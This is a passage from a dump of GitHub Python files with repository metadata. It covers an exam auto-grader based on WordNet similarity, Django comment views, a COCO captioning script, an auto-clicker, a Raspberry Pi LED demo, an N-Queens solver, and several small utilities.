computed\n if best_score is not None:\n score += best_score\n count += 1\n # Average the values\n score /= count\n return score\n\ndef sim2(sentence1,sentence2):\n \"\"\" compute the sentence similarity using Wordnet \"\"\"\n # convert number,clean_text and\n sentence1 = deEmojify(clean_text(convert_number(sentence1)))\n sentence2 = deEmojify(clean_text(convert_number(sentence2)))\n # print(sentence1)\n # Tokenize and tag\n sentence1 = pos_tag(filtered_words(word_tokenize(sentence1)))\n sentence2 = pos_tag(filtered_words(word_tokenize(sentence2)))\n\n # Get the synsets for the tagged words\n synsets1 = [tagged_to_synset(*tagged_word) for tagged_word in sentence1]\n synsets2 = [tagged_to_synset(*tagged_word) for tagged_word in sentence2]\n # print(synsets1)\n # print(synsets2)\n # Filter out the Nones\n synsets1 = [ss for ss in synsets1 if ss]\n synsets2 = [ss for ss in synsets2 if ss]\n print(synsets1)\n print(synsets2)\n score, count = 0.0, 0\n\n # For each word in the first sentence\n for synset in synsets1:\n # Get the similarity value of the most similar word in the other sentence\n ''' Return a score denoting how similar two word senses are, based on the shortest path that connects \n the senses in the is-a (hypernym/hypnoym) taxonomy. The score is in the range 0 to 1. By default, there is now \n a fake root node added to verbs so for cases where previously a path could not be found---and None was returned---it should return \n a value. The old behavior can be achieved by setting simulate_root to be False.\n A score of 1 represents identity i.e. comparing a sense with itself will return 1.\n '''\n x1 = [synset.path_similarity(ss) for ss in synsets2]\n print(x1)\n x2 = [0]\n for i in x1:\n if i is not None:\n x2.append(i)\n best_score = max(x2)\n # Check that the similarity could have been computed\n if best_score is not None:\n score += best_score\n count += 1\n # Average the values\n score /= count\n return score\n\ndef sentence_similarity(sentence1, sentence2):\n score=max(sim1(sentence1,sentence2),sim2(sentence1,sentence2))\n return score\n\n# def find_top_n(text):\n# sents = sent_tokenizer(text)\n# sent_counter=0\n# for sent in sents:\n# sent_counter+=1\n# return sent_counter\n\n\n\n\nmycursor=mydb.cursor()\n\n\n# now = datetime.now()\n# current_time = now.strftime(\"%H:%M:%S\")\n# today = date.today()\n# current_day = today.strftime(\"%Y-%M-%D\")\nsl='select * from exam where flag =0'\nmycursor.execute(sl)\nexams=mycursor.fetchall()\n\nfor exam in exams:\n flag=int(exam[8])\n s='select * from question where eId='+int(exam[0]).__str__()\n mycursor.execute(s)\n questions = mycursor.fetchall()\n for i in questions:\n qid = int(i[0])\n text1 = i[2]\n s1=sentence_summarization(text1)\n mycursor.execute('select * from stuanswer where qId='+qid.__str__())\n stuanswers = mycursor.fetchall()\n for j in stuanswers:\n text2 = j[3]\n sid = int(j[0])\n eid = int(j[2])\n if (j[4] == None):\n if(j[3]==None):\n mark=0\n else:\n qmark = i[3]\n s2=sentence_summarization(text2)\n x=sentence_similarity(text1,text2)\n m=x*float(qmark)\n mark=round(m,1)\n print(mark)\n b=mark-int(mark)\n if b>0.5 and b<=0.9:\n mark=math.ceil(mark)\n elif b<0.5 and b>=0.1:\n mark=math.floor(mark)\n try:\n # Execute the SQL commands\n updatemarksql = 'update stuanswer set qMark=' + mark.__str__() + ' where stuId=' + sid.__str__() + ' and qId=' + qid.__str__() + ' and eId=' + eid.__str__()\n mycursor.execute(updatemarksql)\n\n # Commit your changes in the database\n mydb.commit()\n except:\n # Rollback in case there is any error\n mydb.rollback()\n\n mycursor.execute('select * from stuanswer')\n\n # Displaying the result\n print(mycursor.fetchall())\n\n stusql='select eId,stuId,sum(qMark) from(select * from stuanswer where eId= '+int(exam[0]).__str__()+' )as stu group by stuId '\n\n mycursor.execute(stusql)\n d=mycursor.fetchall()\n\n\n for t in d:\n if flag==0:\n insertmarksql='insert into mark values('+int(t[0]).__str__()+','+int(t[1]).__str__()+','+int(t[2]).__str__()+')'\n mycursor.execute(insertmarksql)\n mydb.commit()\n esql = 'update exam set flag=1 where eId=' +int(t[0]).__str__()\n mycursor.execute(esql)\n mydb.commit()\n\n\nmycursor.execute('select * from mark')\nprint(mycursor.fetchall())\nmydb.close()","repo_name":"Suha523/AGSOEQ-E-Exam","sub_path":"testCode2.py","file_name":"testCode2.py","file_ext":"py","file_size_in_byte":10975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21350061167","text":"from django.shortcuts import render\nfrom .models import Comment,Reply\n\n# Create your views here.\n#Comment submission by logged in user\n@login_required\ndef submit_comment(request):\n\n if request.method == 'POST' :\n\n comment_title = request.POST.get('comment_title')\n comment_content = request.POST.get('comment_content')\n post_id = request.POST.get('post_id')\n current_user = request.user\n profile = UserProfileInfo.objects.get(user=current_user)\n\n c = Comment()\n c.post = Post.objects.get(id=post_id)\n c.content = comment_content\n c.author = UserProfileInfo.objects.get(id=profile.id)\n c.published_date = datetime.now()\n c.save()\n\n return HttpResponseRedirect(reverse('blog:post_details', args=(post_id, )))\n\n#Reply submission by logged in user\n@login_required\ndef submit_reply(request):\n\n if request.method == 'POST' :\n post_id = request.POST.get('post_id')\n reply_title = request.POST.get('reply_title')\n reply_content = request.POST.get('reply_content')\n comment_id = request.POST.get('comment_id')\n current_user = request.user\n profile = UserProfileInfo.objects.get(user=current_user)\n\n r = Reply()\n r.comment = Comment.objects.get(id=comment_id)\n r.content = reply_content\n r.author = UserProfileInfo.objects.get(id=profile.id)\n r.published_date = datetime.now()\n r.save()\n\n return HttpResponseRedirect(reverse('blog:post_details', args=(post_id, ))) # have to work here\n","repo_name":"dimiksonkha/django-blog","sub_path":"comments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"24412973084","text":"from coco_utils import *\nfrom coco_train import data_transform\nfrom coco_vocab import load_vocabulary\nfrom coco_models import CNN, RNN\nimport json\n\n\ndef predict(args):\n # hyperparameters\n batch_size = args.batch_size\n\n vocab = load_vocabulary()\n\n test_path = 'data/test2014'\n test_file_name = 'captions_test2014_rnn152_results.json'\n\n val_path = 'data/val2014'\n val_file_name = 'captions_val2014_rnn152_results.json'\n\n test_loader = get_image_loader(dir_path=os.path.join(test_path),\n transform=data_transform,\n batch_size=batch_size,\n shuffle=True,\n num_workers=2)\n val_loader = get_image_loader(dir_path=os.path.join(val_path),\n transform=data_transform,\n batch_size=batch_size,\n shuffle=True,\n num_workers=2)\n\n embed_size = args.embed_size\n num_hidden = args.num_hidden\n\n encoder = CNN(embed_size)\n decoder = RNN(embed_size, num_hidden, len(vocab), 1)\n\n encoder_state_dict, decoder_state_dict, optimizer, *meta = load_model(args.checkpoint_file)\n encoder.load_state_dict(encoder_state_dict)\n decoder.load_state_dict(decoder_state_dict)\n\n if torch.cuda.is_available():\n encoder.cuda()\n decoder.cuda()\n\n try:\n test_results = []\n for step, (images, image_ids) in enumerate(test_loader):\n images = to_variable(images, volatile=True)\n features = encoder(images)\n captions = decoder.sample(features)\n captions = captions.cpu().data.numpy()\n captions = [translation(cap, vocab) for cap in captions]\n captions_formatted = [{'image_id': int(img_id), 'caption': cap} for img_id, cap in zip(image_ids, captions)]\n test_results.extend(captions_formatted)\n print('Sample:', captions_formatted)\n except KeyboardInterrupt:\n print('if you wish')\n finally:\n with open(test_file_name, 'w') as f:\n json.dump(test_results, f)\n\n try:\n val_results = []\n for step, (images, image_ids) in enumerate(val_loader):\n images = to_variable(images, volatile=True)\n features = encoder(images)\n captions = decoder.sample(features)\n captions = captions.cpu().data.numpy()\n captions = [translation(cap, vocab) for cap in captions]\n captions_formatted = [{'image_id': int(img_id), 'caption': cap} for img_id, cap in zip(image_ids, captions)]\n val_results.extend(captions_formatted)\n print('Sample:', captions_formatted)\n except KeyboardInterrupt:\n print('if you wish')\n finally:\n with open(val_file_name, 'w') as f:\n json.dump(val_results, f)\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--checkpoint_file', type=str,\n default=None, help='path to saved checkpoint')\n parser.add_argument('--batch_size', type=int,\n default=128, help='size of batches')\n parser.add_argument(\"--test\", type=int,\n default=1, help='if eval test data')\n parser.add_argument('--embed_size', type=int,\n default='512', help='number of embeddings')\n parser.add_argument('--num_hidden', type=int,\n default='512', help='number of embeddings')\n args = parser.parse_args()\n predict(args)","repo_name":"christophe001/MSCOCO","sub_path":"coco_prediction.py","file_name":"coco_prediction.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32857803156","text":"#m1\nfrom asyncio import sleep\nimport time\nimport threading\nfrom pynput.mouse import Button, Controller\nfrom pynput.keyboard import Listener, KeyCode\n\n\n#m2\nimport pyautogui\n\n\n\n\n\n#Method 1\ndef method1():\n time.sleep(1)\n button = Button.right\n mouse = Controller()\n mouse.click(button=button)\n#Method 1\n\n\n\n#Method 2\n# pip install pyautogui\ndef method2():\n pyautogui.click(500,100)\n#Method 2\n\n\n\n\n#Keyboard Start\ndef keb():\n pyautogui.typewrite(\"Hello World\")\n#Keyboard End\n\n\n\n\n\n#Main Function Start\ndef main():\n method2()\n time.sleep(1)\n keb()\n\nif __name__==\"__main__\":\n main()\n#Main Function End\n","repo_name":"rezafarazi/auto_clicker_and_writer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30207348844","text":"#n-queen is a problem of placing n queens on a n*n chess board such that no queen can attack any other queens on the board. \n#The queen can attack horizontally, vertically and diagonally.\n#This is a recursive solution to the n-queen problem.\n#The solution is based on the backtracking algorithm.\n\n\nN = int(input(\"Enter the number of queens: \"))\n\nboard = [[0]*N for _ in range(N)] #create a 2d array of size N*N and initialize it with 0\n\ndef isAttack(i,j): #function to check if a queen can attack another queen\n for k in range(N): #for every row and column\n if (board[i][k] == 1 or board[k][j] == 1):\n return True\n \n for k in range(N): #for every diagonal\n for m in range(N):\n if ((k+m == i+j) or (k-m == i-j)):\n if board[k][m] == 1:\n return True\n return False\n\ndef NQueen(n): #function to place n queens on the board\n if n==0:\n return True\n \n for i in range(N): #for every row and column\n for j in range(N):\n if not(isAttack(i,j)) and (board[i][j]!=1):\n board[i][j] = 1\n \n if NQueen(n-1)==True: #recursive call\n return True\n \n board[i][j] = 0 #backtracking\n return False\n\n\n#Driver Code\nNQueen(N)\n\n#print the board\nfor i in board:\n print(i)","repo_name":"vinay-ghate/Algorithms-With-Py","sub_path":"nqueen.py","file_name":"nqueen.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14198343775","text":"import queue\nfrom typing import List, Any\n\n\nclass Solution:\n def duplicateZeros(self, arr: List[int]) -> None:\n \"\"\"\n Do not return anything, modify arr in-place instead.\n \"\"\"\n temp: Any = queue.Queue()\n for i in range(len(arr)):\n if arr[i] == 0:\n temp.put(0)\n if not temp.empty():\n temp.put(arr[i])\n arr[i] = temp.get()\n","repo_name":"FanchenBao/leetcode","sub_path":"Contest_141/1089.py","file_name":"1089.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"34381927476","text":"# coding : utf-8\n\n# GPIO\nimport RPi.GPIO as GPIO\n\nimport time\n\n# GPIO 핀번호 할당\n# 메서드에 대문자 없음! 주의!\nGPIO.setmode(GPIO.BOARD)\n\n# 핀번호(CHANNEL)\nLED_R = 11 # 빨간색 LED\n\n# 듀티비(밝기 목록) : 0.0~100.0(순차적)\ndc = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 20, 30, 50, 70, 100]\n\n# 핀 속성 설정\nGPIO.setup(LED_R, GPIO.OUT, initial=GPIO.LOW)\n\n# PWM(Pulse Width Modulation) : 펄스 폭 변조\n# 하이 레벨과 로우 레벨의 중간 값을 유사하게 표현하는 신호 방식\n# PWM 객체 생성 : 11번 핀, 주파수 - 100Hz\np = GPIO.PWM(LED_R, 100)\n\n# PWM 신호 출력 \np.start(30) # 듀티비\n\ntime.sleep(5)\n\n# PWM 정지\np.stop()\n\n# GPIO 개방\nGPIO.cleanup()","repo_name":"db3124/kitech_iot","sub_path":"Rasberry/200219/led_pwm_1_200219.py","file_name":"led_pwm_1_200219.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14667016953","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pfrl\nimport torch\nimport gym\nimport argparse\nfrom pfrl.q_function import StateQFunction\nimport torch.nn.functional as F\nfrom pfrl.initializers import init_chainer_default\nfrom pfrl.nn.mlp import MLP\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom ns3gym import ns3env\n\nparser = argparse.ArgumentParser(description=\"start simulation script on/off\")\nparser.add_argument('--start', type= int,default=1,help=\"start the ns-3 simulation script 0/1, default=1\")\nparser.add_argument('--total_episodes', type=int ,default=100, help=\"the total episodes number default= 100 episodes\")\nparser.add_argument('--total_steps', type=int, default=300, help=\"total steps number in each episode, default= 300 steps\")\nparser.add_argument('--agent_name',type=\"str\",default=\"Dueling DDQN\"\n ,help=\"choose the DRL agent that will give decisions for the simulation, \"\n \"DRL agents: Dueling DDQN | Dueling DDQN-MLPS | DDQN, default= Dueling DDQN\")\n\nargs = parser.parse_args()\nstartSim = bool(args.start)\ntotal_episodes = args.total_episodes\ntotal_steps = args.total_steps\nagent_name= args.agent_name\n\nport = 5555\n\n# env = gym.make('ns3-v0',port=port)\nenv = ns3env.Ns3Env(port=port,startSim=startSim)\nenv.reset() \n\nob_space = env.observation_space\nac_space = env.action_space\nprint(\"Observation space: \", ob_space, ob_space.dtype)\nprint(\"Action space: \", ac_space, ac_space.n)\n\n# obs_size must be 4 since we inject the delay value in observation vector,\n# but we'll not use it for the observation\nobs_size = 4\nn_actions = env.action_space.n\n\n#Dueling DDQN QFunction\nclass DuelingDDQNQFunction(torch.nn.Module):\n def __init__(self, obs_size, n_actions):\n super().__init__()\n self.l1 = torch.nn.Linear(obs_size, 50)\n self.l2 = torch.nn.Linear(50, 50)\n self.l3_v = torch.nn.Linear(50, 1) # State value function stream\n self.l3_a = torch.nn.Linear(50, n_actions) # Advantage function stream\n\n def forward(self, x):\n h = x\n h = torch.nn.functional.relu(self.l1(h))\n h = torch.nn.functional.relu(self.l2(h))\n\n v = self.l3_v(h)\n a = self.l3_a(h)\n\n q = v + a - a.mean(dim=1, keepdim=True)\n return pfrl.action_value.DiscreteActionValue(q)\n\n# bias initializer for the FC layers\ndef constant_bias_initializer(bias=0.0):\n @torch.no_grad()\n def init_bias(m):\n if isinstance(m, torch.nn.Linear):\n m.bias.fill_(bias)\n\n return init_bias\n\n#Dueling DDQN with MLP\nclass DuelingDQNWithMLP(torch.nn.Module, StateQFunction):\n \"\"\"Dueling Q-Network\n\n See: http://arxiv.org/abs/1511.06581\n \"\"\"\n\n def __init__(self, n_actions, n_input_elements, activation=F.relu, bias=0.1):\n self.n_actions = n_actions\n self.n_input_elements = n_input_elements\n self.activation = activation\n self.bias = bias\n super().__init__()\n\n # Define the linear layers to replace the convolutional layers\n self.fc_layers = torch.nn.ModuleList(\n [\n torch.nn.Linear(n_input_elements, 50),\n torch.nn.Linear(50, 50),\n torch.nn.Linear(50, 50),\n ]\n )\n\n # MLPs for the advantage and value streams\n self.a_stream = MLP(50, n_actions, [25]) # Update the input size to 64\n self.v_stream = MLP(50, 1, [25])\n\n # Apply initialization and bias to the linear layers\n self.fc_layers.apply(init_chainer_default) # MLP already applies\n self.fc_layers.apply(constant_bias_initializer(bias=self.bias))\n\n def forward(self, x):\n h = x\n\n # Pass through the linear layers with activation\n for layer in self.fc_layers:\n h = self.activation(layer(h))\n\n # Advantage\n batch_size = x.shape[0]\n h = h.view(batch_size, -1) # Reshape instead of flatten\n ya = self.a_stream(h)\n mean = torch.reshape(torch.sum(ya, dim=1) / self.n_actions, (batch_size, 1))\n ya, mean = torch.broadcast_tensors(ya, mean)\n ya -= mean\n\n # State value\n ys = self.v_stream(h)\n\n ya, ys = torch.broadcast_tensors(ya, ys)\n q = ya + ys\n return pfrl.action_value.DiscreteActionValue(q)\n \n# DDQN QFunction\nclass DDQNQFunction(torch.nn.Module):\n\n def __init__(self, obs_size, n_actions):\n super().__init__()\n self.l1 = torch.nn.Linear(obs_size, 50)\n self.l2 = torch.nn.Linear(50, 50)\n self.l3 = torch.nn.Linear(50, n_actions)\n\n def forward(self, x):\n h = x\n h = torch.nn.functional.relu(self.l1(h))\n h = torch.nn.functional.relu(self.l2(h))\n h = self.l3(h)\n return pfrl.action_value.DiscreteActionValue(h)\n\nif agent_name == \"Dueling DDQN\":\n q_func = DuelingDDQNQFunction(obs_size, n_actions)\nelif agent_name == \"Dueling DDQN-MLPS\":\n q_func = DuelingDQNWithMLP(n_actions=n_actions,n_input_elements=obs_size,activation=torch.nn.functional.relu, bias=0.1)\nelse:\n q_func= DDQNQFunction(obs_size, n_actions)\n\n# Agent parameters and components setup\noptimizer = torch.optim.Adam(q_func.parameters(), eps=1e-2)\n# Set the discount factor that discounts future rewards.\ngamma = 0.9\n\n# Use epsilon-greedy for exploration\nexplorer = pfrl.explorers.LinearDecayEpsilonGreedy(\n start_epsilon=1.0, end_epsilon=0.0, decay_steps=2500, random_action_func=env.action_space.sample)\n# Specify a replay buffer and its capacity.\nreplay_buffer = pfrl.replay_buffers.ReplayBuffer(capacity=10 ** 6)\n\n# Since observations from ns3 simulation is numpy.float64 while\n# As PyTorch only accepts numpy.float32 by default, specify\n# a converter as a feature extractor function phi.\nphi = lambda x: x.astype(np.float32, copy=False)\n\n# Set the device id to use GPU. To use CPU only, set it to -1.\n# gpu = -1\n\n#Now create an agent that will interact with the environment \n#based on Double Learning and the selected QFunction.\nagent = pfrl.agents.DoubleDQN(\n q_func,\n optimizer,\n replay_buffer,\n gamma,\n explorer,\n replay_start_size=128,\n update_interval=1,\n target_update_interval=10,\n minibatch_size=128,\n phi=phi,\n # gpu=gpu,\n)\n\ndelay_history = []\nrew_history = []\n\nenv._max_episode_steps = total_steps\n\nfor i in range(1, total_episodes + 1):\n obs = env.reset()\n \n delaySum = 0 # return (sum of delaySum)\n obs = obs[:4]\n print(\"reset State:\",obs)\n rewardSum = 0 # return (sum of rewards)\n\n for step in range(1, total_steps + 1):\n \n action = agent.act(obs)\n obs, reward, done, _ = env.step(action)\n delaySum += obs[4]\n obs = obs[:4]\n rewardSum += reward\n reset = step == total_steps # testing if the steps reach the max value\n agent.observe(obs, reward, done, reset)\n\n if done:\n break\n\n avg_delay = delaySum / step \n delay_history.append(avg_delay/int(_)) \n rew_history.append(rewardSum) \n \n if i % 10 == 0:\n print('episode:', i, 'R:', rewardSum)\n print(\"episode: {}/{}, time: {}, rew: {}, eps: {}\"\n .format(i, total_episodes, step, rewardSum, agent.explorer.__dict__.values()))\n if i % 50 == 0:\n print('statistics:', agent.get_statistics())\n \nprint('Finished.')\n\nagent.save(\"/home/gadour/Blobs\")\n\nprint(\"Plot Learning Performance\")\nmpl.rcdefaults()\nmpl.rcParams.update({'font.size': 16})\n# Create a figure with two subplots\nfig, (ax1, ax2) = plt.subplots(2, 1, figsize=(10, 8), sharex=True)\n# Plot 1: Learning Performance (Reward)\nax1.plot(range(len(rew_history)), rew_history, label='Reward', marker=\"\", color='red')\nax1.set_ylabel('Reward Sum')\nax1.legend(prop={'size': 12})\n\n# Plot 2: ( delaySum)\nax2.plot(range(len(delay_history)), delay_history, label='delay', marker=\"\", color=\"blue\")\nax2.set_ylabel('Average Delay')\nax2.legend(prop={'size': 12})\n\n# Common X-axis label for both plots\nax2.set_xlabel('Episode')\n\n# Adjust layout and save the plot to file\nplt.tight_layout()\nplt.savefig(f'{agent_name}-results.pdf', bbox_inches='tight')\n\n# Show the plots\nplt.show()\n\n# ns3gym 0.1.0 requires protobuf==3.20.3, but you have protobuf 4.21.12 which is incompatible. pip\n","repo_name":"Abdelkader-gnichi/network-routing-optimization-based-on-DRL-Agents-decisions-in-remote-rural-areas","sub_path":"agent_1.py","file_name":"agent_1.py","file_ext":"py","file_size_in_byte":8224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71894572383","text":"from django.test import TestCase\nfrom ford3.models.field_of_study import FieldOfStudy\nfrom ford3.tests.models.model_factories import ModelFactories\n\n\nclass TestFieldOfStudy(TestCase):\n def setUp(self):\n self.field_of_study = ModelFactories.get_field_of_study_test_object()\n\n def test_field_of_study_description(self):\n self.assertEqual(\n self.field_of_study.__str__(),\n 'Object Test Name')\n\n def test_get_or_create(self):\n # it should get\n fos, created = FieldOfStudy.objects.get_or_create(\n name=self.field_of_study)\n self.assertEqual(fos.id, self.field_of_study.id)\n self.assertFalse(created)\n\n # it should create\n fos, created = FieldOfStudy.objects.get_or_create(\n name='Manufacturing, Engineering and Technology')\n self.assertNotEqual(fos.id, self.field_of_study.id)\n self.assertTrue(created)\n self.assertEqual(len(FieldOfStudy.objects.all()), 2)\n","repo_name":"kartoza/ford3","sub_path":"django_project/ford3/tests/models/test_field_of_study.py","file_name":"test_field_of_study.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18213784695","text":"from utils import split_dict\n\nimport os\nimport pandas as pd\nimport logging\n\nclass HyperparamKeeper:\n \n @property\n def df(self):\n self.__check_dirty()\n return self.__params\n \n @property\n def meta_cols(self): return self.__meta_cols\n @property\n def rec_cols(self): return self.__rec_cols\n @property\n def result_cols(self): return self.__result_cols\n\n #cols = ('data__label', 'data__size', 'vect__ngram_range', 'vect__max_df', 'clf__penalty', 'clf__C', 'cv__fold', 'cv__scoring', 'cv__score') \n\n def __init__(self, filename, cols, convs=None, score_idx=-1):\n\n self.__meta_cols = tuple(cols[0])\n self.__rec_cols = tuple(cols[1])\n self.__result_cols = tuple(cols[2])\n cols = [*self.__meta_cols, *self.__rec_cols, *self.__result_cols]\n\n self.__score_idx = score_idx\n self.__fname = filename\n self.__params = pd.read_csv(self.__fname, index_col=0, converters=convs) if os.path.exists(self.__fname) else\\\n pd.DataFrame([], columns=cols)\n self.__dirty = False\n \n def __str__(self):\n return str(self.__params)\n \n def __check_dirty(self):\n if self.__dirty:\n self.__params.drop_duplicates(inplace=True)\n self.__dirty = False\n \n def __check_pm_name(self, pm, target=None):\n if target is None:\n target = self.__params.columns\n \n if len(pm) != len(target):\n logging.warning(\"The parameter name length '%d %s' is not match to %d %s\" % (len(pm), pm, len(target), target))\n return False\n \n for name in pm:\n if name not in target:\n logging.warning(\"The parameter name '%s' is not allowed\" % name)\n return False\n return True\n \n def __assert_pm_name(self, pm, target=None):\n if not self.__check_pm_name(pm, target):\n raise Exception('Not matched param columns')\n \n def __cond(self, pm):\n for i, (p, v) in enumerate(pm.items()):\n if i == 0:\n cond = (self.__params[p] == v)\n else:\n cond &= (self.__params[p] == v)\n return cond\n \n def __dup_params(self, pm):\n pm = pm.copy()\n for p in self.__result_cols:\n pm.pop(p, None)\n\n self.__assert_pm_name(pm, [*self.__meta_cols, *self.__rec_cols]) #no result cols\n return self.__params[self.__cond(pm)]\n\n \n def is_dup(self, pm):\n return not self.__dup_params(pm).empty\n\n \n def add(self, pm, ifdup='update'):\n self.__assert_pm_name(pm)\n self.__params.loc[len(self.__params)] = pm\n self.__dirty = True\n\n def save(self):\n self.__check_dirty()\n os.makedirs(os.path.dirname(self.__fname), exist_ok=True)\n self.__params.to_csv(self.__fname)\n \n # put new item and return (new) dict\n @staticmethod\n def __put(d, k, v, inplace=False):\n if not inplace:\n d = d.copy()\n d[k] = v\n return d\n\n # return the list of pm generated form meta[idx:]\n # @pm is a dict of paramter/value\n @classmethod\n def __gen(cls, meta, idx):\n if idx >= len(meta):\n return [{}] # empty pm\n\n p, vals = meta[idx]\n\n # 'inplace' is not necessary, just for dict reuse\n return [ cls.__put(pm, p, v, inplace=(i==0)) \\\n for pm in cls.__gen(meta, idx + 1) \\\n for i, v in enumerate(vals) ]\n\n # @pm_rec: not 'score' and not 'meta'\n # return best score and its meta param\n def best_param(self, pm_temp):\n rec, _ = split_dict(pm_temp, self.__rec_cols)\n\n calidates = self.__params[self.__cond(rec)].iloc[:, self.__score_idx]\n if calidates.empty:\n return None, None\n best = dict(self.__params.iloc[calidates.idxmax()].items())\n \n meta, result, _ = split_dict(best, self.__meta_cols, self.__result_cols)\n\n #logging.info('best: %s, %s' % (meta, result))\n return meta, result\n \n # @pm_temp: parameter template: contain 'meta' (list) and 'rec' (normal), without 'score' column\n # flaten params and skim the duplicatd params, according to @pm_temp\n def gen_params(self, pm_temp, by='nodup'):\n \n # extract meta parameter from template\n meta, rec, _ = split_dict(pm_temp, self.__meta_cols, self.__rec_cols)\n \n def listify(pm):\n for p in meta:\n v = pm[p]\n pm[p] = [v]\n return pm\n \n metas = []\n for m in self.__gen(list(meta.items()), 0): \n if not self.is_dup({**m, **rec}):\n metas.append(listify(m))\n \n return metas\n\n '''\n # a trivial version of __gen(meta,0) is like below, if len(meta) is fixed to 4:\n p1, p2, p3, p4 = meta \n for v1 in pm_meta[p1]:\n for v2 in pm_meta[p2]:\n for v3 in pm_meta[p3]:\n for v4 in pm_meta[p4]:\n pm = {p1: v1, p2: v2, p3: v3, p4: v4}\n '''\n \nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO,\n format=\"%(asctime)s.%(msecs)03d [%(levelname)s] [%(module)s] %(message)s\", datefmt=\"%H:%M:%S\")\n\n\n pm_grid = {\n 'clf__C': [30.0],\n 'clf__penalty': ['l1'],\n 'vect__max_df': [0.5, 0.7],\n 'vect__ngram_range': [(1,1), (2,2), (3, 3), (4,4), (5,5), (99,99)],\n\t}\n\n convs = {p:eval for p, v in pm_grid.items() if isinstance(v[0], tuple)}\n\n logging.info(\"hyperparameters:\")\n cols = (sorted(pm_grid.keys()), ('task_name', 'data_size', 'cv_fold', 'cv_scoring'), ('score', 'std'))\n hyparams = HyperparamKeeper('.params-test', cols, convs)\n logging.info(hyparams.df)\n\n # add pseudo data ===================\n pm1 = {\n 'task_name': 'TOD',\n 'data_size': 14383,\n 'cv_fold': 2,\n 'cv_scoring': 'f1',\n 'clf__C': 30.0,\n 'clf__penalty': 'l1',\n 'vect__max_df': 0.5,\n 'vect__ngram_range': (1,1), \n 'score': 1.0,\n 'std': 0.0\n }\n\n pm2 = {**pm1, 'vect__ngram_range': (2,2), 'score': 2.0}\n pm3 = {**pm1, 'vect__ngram_range': (3,3), 'score': 3.0}\n\n hyparams.add(pm1)\n hyparams.add(pm2)\n\n # test is dup ==================================\n logging.info('')\n for pm in (pm1, pm2, pm3):\n del pm['score']\n logging.info(\"is params dup: %s %s\" % (hyparams.is_dup(pm), pm))\n\n # testing gen_params ==================================\n pm_temp = { \n 'task_name': 'TOD',\n 'data_size': 14383,\n 'cv_fold': 2,\n 'cv_scoring': 'f1',\n 'clf__C': [30.0],\n 'clf__penalty': ['l1'],\n 'vect__max_df': [0.5],\n 'vect__ngram_range': [(1,1), (2,2), (3,3), (4,4)] \n }\n\n pms = [str(pm) for pm in hyparams.gen_params(pm_temp)]\n logging.info('')\n logging.info('\\n '.join([\"Generated params: \", *pms]))\n\n # testing best score ==================================\n best_pm, best_result = hyparams.best_param(pm_temp)\n logging.info('')\n logging.info(\"Best result: %s\" % best_result)\n logging.info(\"Best param: %s\" % best_pm)\n\n","repo_name":"jianwei76/SoliAudit","sub_path":"va/vul-predict/hyperparam.py","file_name":"hyperparam.py","file_ext":"py","file_size_in_byte":7275,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"7"} +{"seq_id":"9941004373","text":"import pygame\r\nimport sprite\r\n\r\nvec = pygame.math.Vector2\r\n\r\n\r\nclass Yukari(sprite.Sprite):\r\n def __init__(self, spawn_x, spawn_y):\r\n super().__init__(\"res/img/yukari.png\", spawn_x, spawn_y)\r\n self.pos = vec(self.rect.center)\r\n\r\n def update(self):\r\n self.rect.center = self.pos\r\n\r\n\r\nclass MagicCircle(sprite.Sprite):\r\n def __init__(self, spawn_x, spawn_y):\r\n super().__init__(\"res/img/magic_circle.png\", spawn_x, spawn_y)\r\n self.pos = vec(self.rect.center)\r\n self.frame = 0\r\n self.original_image = pygame.image.load(\"res/img/magic_circle.png\")\r\n self.image = self.original_image\r\n self.angle = 0\r\n self.fast = False\r\n\r\n def update(self):\r\n cx, cy = self.rect.center\r\n if self.fast:\r\n self.image = pygame.transform.rotate(self.original_image, self.angle)\r\n self.angle += -2 % -360\r\n else:\r\n self.image = pygame.transform.rotate(self.original_image, self.angle)\r\n self.angle += 1 % 360\r\n self.rect = self.image.get_rect()\r\n self.rect.center = (cx, cy)\r\n","repo_name":"vv52/destitute-dreamscape","sub_path":"yukari.py","file_name":"yukari.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23721605421","text":"import numpy as np\n# import re\n# import os\nimport cv2\nimport pandas as pd\n# import plotly.express as px\n# import plotly.graph_objects as go\n# import matplotlib.pyplot as plt\nfrom skimage.measure import label, regionprops_table\nfrom skimage.morphology import dilation\n# from plotly.subplots import make_subplots\n# import plotly.io as pio\nfrom skimage.transform import warp\nfrom sklearn.mixture import GaussianMixture\nimport warnings\nfrom skimage.transform import hough_line, hough_line_peaks\nfrom skimage.transform import AffineTransform, warp\nfrom skimage.measure import shannon_entropy\n# pio.renderers.default = 'notebook'\n\nclass Image_fe:\n \n # reads image and applies median blur\n def __init__(self, img_name, path = 